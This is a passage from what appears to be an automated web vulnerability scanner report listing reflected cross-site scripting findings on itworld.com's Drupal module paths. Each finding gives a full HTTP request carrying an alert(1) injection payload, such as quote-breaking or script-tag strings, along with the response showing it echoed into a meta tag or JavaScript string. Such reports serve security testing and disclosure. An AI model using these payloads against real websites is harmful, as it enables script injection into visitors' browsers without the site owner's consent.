Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/cluetip/cluetip71953"-alert(1)-"cd0a9f2e1f0/jquery.cluetip.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:50 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460350"
Content-Type: text/html; charset=utf-8
Content-Length: 57565
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:54 GMT
X-Varnish: 1038161244
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/cluetip/cluetip71953"-alert(1)-"cd0a9f2e1f0/jquery.cluetip.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested."
...[SNIP]...

1.140. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c0b1"><script>alert(1)</script>62dd8bd6a98 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/cluetip/cluetip4c0b1"><script>alert(1)</script>62dd8bd6a98/jquery.cluetip.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:44 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460344"
Content-Type: text/html; charset=utf-8
Content-Length: 57785
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:45 GMT
X-Varnish: 1038160943
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip4c0b1"><script>alert(1)</script>62dd8bd6a98/jquery.cluetip.js?h"/>
...[SNIP]...

1.141. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ec0d"><script>alert(1)</script>39213b93aae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules7ec0d"><script>alert(1)</script>39213b93aae/contrib/cluetip/cluetip/jquery.hoverIntent.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460165"
Content-Type: text/html; charset=utf-8
Content-Length: 57820
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:50 GMT
X-Varnish: 252446542
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules7ec0d"><script>alert(1)</script>39213b93aae/contrib/cluetip/cluetip/jquery.hoverIntent.js?h"/>
...[SNIP]...

1.142. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35be2"-alert(1)-"53a04b94597 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules35be2"-alert(1)-"53a04b94597/contrib/cluetip/cluetip/jquery.hoverIntent.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460186"
Content-Type: text/html; charset=utf-8
Content-Length: 57606
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:25 GMT
X-Varnish: 252446903
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
S";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules35be2"-alert(1)-"53a04b94597/contrib/cluetip/cluetip/jquery.hoverIntent.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't f
...[SNIP]...

1.143. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f33d"-alert(1)-"8605b35cdf4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/cluetip5f33d"-alert(1)-"8605b35cdf4/cluetip/jquery.hoverIntent.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:13 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460313"
Content-Type: text/html; charset=utf-8
Content-Length: 57605
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:39 GMT
X-Varnish: 1038159993
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
erich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/cluetip5f33d"-alert(1)-"8605b35cdf4/cluetip/jquery.hoverIntent.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you
...[SNIP]...

1.144. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc614"-alert(1)-"d40ccf11ee3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/cluetip/cluetipdc614"-alert(1)-"d40ccf11ee3/jquery.hoverIntent.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:26:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460370"
Content-Type: text/html; charset=utf-8
Content-Length: 57604
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:26:11 GMT
X-Varnish: 1038161749
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/cluetip/cluetipdc614"-alert(1)-"d40ccf11ee3/jquery.hoverIntent.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you request
...[SNIP]...

1.145. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d896e"><script>alert(1)</script>74a95ab4ffc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/cluetip/cluetipd896e"><script>alert(1)</script>74a95ab4ffc/jquery.hoverIntent.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:58 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460358"
Content-Type: text/html; charset=utf-8
Content-Length: 57825
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:26:05 GMT
X-Varnish: 1038161386
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetipd896e"><script>alert(1)</script>74a95ab4ffc/jquery.hoverIntent.js?h"/>
...[SNIP]...

1.146. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ef5"><script>alert(1)</script>bd527ad5cce was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.jsb4ef5"><script>alert(1)</script>bd527ad5cce?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:26:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460399"
Content-Type: text/html; charset=utf-8
Content-Length: 57825
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:26:41 GMT
X-Varnish: 1038162467
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.jsb4ef5"><script>alert(1)</script>bd527ad5cce?h"/>
...[SNIP]...

1.147. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fafed"-alert(1)-"2dd4b1a63a4 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.jsfafed"-alert(1)-"2dd4b1a63a4?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:26:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460416"
Content-Type: text/html; charset=utf-8
Content-Length: 57605
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:26:57 GMT
X-Varnish: 1038163147
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...

s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.jsfafed"-alert(1)-"2dd4b1a63a4";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.148. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/ajax-responder.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5adf7"-alert(1)-"689a46b3a6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites5adf7"-alert(1)-"689a46b3a6b/all/modules/contrib/ctools/js/ajax-responder.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:21:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460085"
Content-Type: text/html; charset=utf-8
Content-Length: 57500
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:21:31 GMT
X-Varnish: 1959725231
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
s.prop13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites5adf7"-alert(1)-"689a46b3a6b/all/modules/contrib/ctools/js/ajax-responder.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't
...[SNIP]...

1.149. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/ajax-responder.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dfbf"><script>alert(1)</script>d3d5d2973ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites7dfbf"><script>alert(1)</script>d3d5d2973ea/all/modules/contrib/ctools/js/ajax-responder.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:21:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460075"
Content-Type: text/html; charset=utf-8
Content-Length: 57720
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:21:18 GMT
X-Varnish: 1959724939
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites7dfbf"><script>alert(1)</script>d3d5d2973ea/all/modules/contrib/ctools/js/ajax-responder.js?h"/>
...[SNIP]...

1.150. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/ajax-responder.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95279"-alert(1)-"f226b924167 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib95279"-alert(1)-"f226b924167/ctools/js/ajax-responder.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460177"
Content-Type: text/html; charset=utf-8
Content-Length: 57505
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:02 GMT
X-Varnish: 252446832
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
